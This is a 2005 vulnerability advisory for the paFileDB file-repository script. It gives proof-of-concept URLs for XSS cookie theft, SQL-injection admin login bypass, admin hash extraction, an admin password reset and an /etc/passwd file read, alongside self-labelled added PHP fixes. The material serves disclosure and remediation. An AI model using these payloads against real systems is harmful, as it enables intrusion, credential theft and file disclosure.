
paFiledb31vuln.txt
Posted Jun 21, 2005
Authored by James Bercegay | Site gulftech.org

paFileDB versions 3.1 and below suffer from multiple cross site scripting, SQL injection, and local file inclusion vulnerabilities.

tags | exploit, local, vulnerability, xss, sql injection, file inclusion
SHA-256 | 0427960de653354efd8c4d33d81c78d90121dc6b3653b5afe2097495b775a352

##########################################################
# GulfTech Security Research June 14th, 2005
##########################################################
# Vendor : php Arena
# URL : http://www.phparena.net/pafiledb.php
# Version : paFileDB 3.1 && Earlier
# Risk : Multiple Vulnerabilities
##########################################################



Description:
paFileDB is a popular open source web application offered by
php Arena. paFileDB allows webmasters to open up an interactive
file repository on their website. There are a number of
vulnerabilities in paFileDB that may allow for an attacker to
include arbitrary files, retrieve sensitive user and/or database
information, and completely bypass admin, and team member
authentication. Users should upgrade immediately.



Cross Site Scripting:
There are a number of cross site scripting issues in the paFileDB
software. The majority of these cross site scripting issues stem from
concatenated variables never being initialized, so the first value a
variable receives is whatever the request supplies.

http://pafiledb/pafiledb.php?action=viewall&start=20&sortby=name%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://pafiledb/pafiledb.php?action=category&id=1&filelist=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://pafiledb/pafiledb.php?action=category&id=1&pages=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

These vulnerabilities can be used to render hostile code in the
context of the victim's browser, and in turn disclose sensitive
information (such as the session cookie) to an attacker.



SQL Injection:
There are a number of SQL Injection vulnerabilities in paFileDB,
but it should be noted that to exploit these issues magic_quotes_gpc
must be off. Also, magic quotes off seems to be the default
php.ini setting now, so I do consider these issues fairly high
risk. The most serious of the SQL Injection issues lies in the
administrative login.

if ($login == "do")
{
    // $formname comes straight from the login form and is interpolated
    // into the SQL string without any escaping or quoting
    $admin = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_admin WHERE admin_username = '$formname'", 1);
    $formpw = md5($formpass);
    // the comparison trusts whatever row the query returned, including
    // a row fabricated by a UNION SELECT in $formname
    if ($formpw == $admin[admin_password])
    {
        $adminip = getenv ("REMOTE_ADDR");
        $ip = md5($adminip);
        $user = $formname;
        $pass = $formpw;

        if ($authmethod == "cookies")
        {
            $cookiedata = "$ip|$formname|$formpw";
            setcookie("pafiledbcookie", $cookiedata);
        }

        header("Location: admin.php");
    }
}


The variable $formname is taken directly from the submitted login form
and used in the query unescaped, so if magic_quotes_gpc is off an attacker
can use UNION SELECT to bypass admin authentication!

http://pafiledb/pafiledb.php?action=admin&login=do&formname=-99'%20UNION%20SELECT%20admin_id,%20admin_username,%20'6f1ed002ab5595859014ebf0951522d9',%20admin_email,%201%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah&B1=%3E%3E+Log+In+%3C%3C&action=admin&login=do

The query above uses a UNION SELECT to return the admin username, id, email etc.,
but we supply the password column ourselves as the md5 hash of the $formpass
variable, so the password comparison succeeds. This same issue applies to the
team login, and also to the auth.php scripts in the /teams/ and /admin/ directories.
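The same login rebuilt so that $formname is passed to the database as a bound value rather than spliced into the SQL string. This is an added example, not paFileDB's own code; it assumes a PDO connection in $pdo and the pafiledb_admin columns named in the advisory, and it keeps the unsalted md5 storage only to stay comparable with the original.

```php
<?php
// Added example, not paFileDB code: a prepared-statement version of the
// admin login. Assumes a PDO handle $pdo and the columns admin_username /
// admin_password on <prefix>_admin, as in the advisory.

function admin_login(PDO $pdo, string $prefix, string $formname, string $formpass): bool
{
    // The table prefix cannot be a bound parameter, so constrain it to a
    // safe character set instead of interpolating it blindly.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $prefix)) {
        throw new InvalidArgumentException('bad table prefix');
    }

    // $formname is sent as data; the driver handles quoting, so a UNION
    // SELECT inside it is matched as a literal username and nothing else.
    $stmt = $pdo->prepare(
        "SELECT admin_password FROM {$prefix}_admin WHERE admin_username = ? LIMIT 1"
    );
    $stmt->execute([$formname]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false;
    }

    // Constant-time comparison against the stored hash. Unsalted md5 is kept
    // only to mirror the original schema; a new deployment would store
    // password_hash() output and call password_verify() here.
    return hash_equals($row['admin_password'], md5($formpass));
}
```

Note that magic_quotes_gpc is not a substitute for this: it only escapes quotes, which is why the advisory's $query hijack below still works with it enabled.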

There is also an SQL Injection vulnerability that will allow for team
members to gain the administrative password hash and escalate their
privileges to admin.

http://pafiledb/pafiledb.php?select=-99'%20UNION%20SELECT%200,admin_username,admin_password,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+Category+%3C%3C&action=team&tm=category&category=edit&edit=form&menu1=%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dcategory%26category%3Dedit

http://pafiledb/pafiledb.php?id=-99'%20UNION%20SELECT%200,admin_username,admin_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+File+%3C%3C&action=team&tm=file&file=edit&edit=form&menu1=%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dfile%26file%3Dedit

Last but not least there is a SQL Injection vulnerability in search.php
because the $string variable is never sanitized.

There is one SQL Injection issue in paFileDB that does not require
magic_quotes_gpc to be disabled. This particular issue will let a team member
run any SQL command that they like, including making themselves an admin.

http://pafiledb/pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20MD5%281337%28%20WHERE%201/*

The above URL would successfully set the admin password to 1337 if run by
a logged in team member or admin. This vulnerability exists because the
$query variable is never initialized before being concatenated to, so we can
hijack the $query variable through the request and run any SQL commands we
like; no quote characters are needed, which is why magic quotes do not help.
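The $query hijack here and the cross site scripting issues earlier in the advisory share one root cause: an accumulator is appended to before it is ever assigned, so with register_globals (or an extract() of the request) the attacker chooses its starting value. The following added example, not paFileDB's own code, contrasts that shape with one that initializes every accumulator, reads request values explicitly, allowlists the sort column and HTML-encodes output; the function names and the sample request are constructed for illustration.

```php
<?php
// Added example, not paFileDB code. Hypothetical helpers showing the
// uninitialized-accumulator bug behind both the $query hijack and the XSS.

// Vulnerable shape: $query and $links are never initialized, and extract()
// lets the request define them (as register_globals did in 2005).
function build_edit_vulnerable(array $request, int $id): array
{
    extract($request);   // ?query=...&sortby=... become local variables
    $query .= "UPDATE files SET name = 'x' WHERE id = $id";   // attacker prefix survives
    $links .= '<a href="?sortby=' . $sortby . '">name</a>';   // raw, unencoded
    return [$query, $links];
}

// Hardened shape: explicit initialization, explicit input, allowlist, encoding.
function build_edit_hardened(array $request, int $id): array
{
    $query = '';
    $links = '';
    $sortby = (string)($request['sortby'] ?? 'name');
    if (!in_array($sortby, ['name', 'date', 'size'], true)) {
        $sortby = 'name';   // unknown sort columns fall back instead of flowing through
    }
    $query .= 'UPDATE files SET name = ? WHERE id = ?';   // placeholders, to be prepared
    $links .= '<a href="?sortby=' . htmlspecialchars($sortby, ENT_QUOTES, 'UTF-8') . '">name</a>';
    return [$query, $links];
}

// Constructed request mirroring the advisory's two parameters.
$req = [
    'query'  => 'UPDATE pafiledb_admin SET admin_password = MD5(1337) WHERE 1/*',
    'sortby' => '"><script>alert(document.cookie)</script>',
];
[$q, $l]   = build_edit_vulnerable($req, 1);   // $q begins with the attacker's UPDATE
[$q2, $l2] = build_edit_hardened($req, 1);     // $q2 is only the intended statement
```

Running the vulnerable function also emits an "undefined variable" notice for $links; that notice in the original code was the only symptom of the bug.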



Local File Include Vulnerability:
paFileDB is vulnerable to a local file inclusion vulnerability that may
allow for an attacker to execute arbitrary local scripts, or read/access
arbitrary files on the webserver. Let's look at pafiledb.php:

if ($login == "do") { include "./includes/$action/login.php"; exit; }
if ($ad == "logout") { include "./includes/admin/logout.php"; exit; }
if ($tm == "logout") { include "./includes/team/logout.php"; exit; }

The $action variable is never sanitized and vulnerable to directory
traversal sequences.

http://pafiledb/pafiledb.php?action=../../../../etc/passwd%00&login=do

This vulnerability exists on all paFileDB configurations, as all GPC
is extracted to global variables.
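One way to dispatch on $action safely, as an added example that is not part of paFileDB: the handler name is checked against an allowlist before it reaches include, and the resolved path is confirmed to lie under the includes directory. The constant names and the assumption that only admin and team login handlers exist are illustrative.

```php
<?php
// Added example, not paFileDB code: allowlisted include dispatch for the
// login handler. Assumes the handlers live at includes/<action>/login.php.

const INCLUDE_ROOT    = __DIR__ . '/includes';
const ALLOWED_ACTIONS = ['admin', 'team'];   // assumed: the only login handlers

function resolve_login_script(string $action): string
{
    // 1. Allowlist: rejects "../", "%00", absolute paths and anything unknown.
    if (!in_array($action, ALLOWED_ACTIONS, true)) {
        throw new RuntimeException('unknown action');
    }

    // 2. Defence in depth: the resolved path must still sit under INCLUDE_ROOT.
    $root = realpath(INCLUDE_ROOT);
    $path = realpath(INCLUDE_ROOT . '/' . $action . '/login.php');
    if ($root === false || $path === false
        || strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException('path escapes include root');
    }
    return $path;
}

// Read parameters explicitly instead of relying on register_globals/extract().
$action = (string)($_GET['action'] ?? '');
$login  = (string)($_GET['login'] ?? '');

if ($login === 'do') {
    include resolve_login_script($action);
    exit;
}
```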



Solution:
A new version of paFileDB has been released, so upgrading is advised.



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00082-06142005



Credits:
James Bercegay of the GulfTech Security Research Team
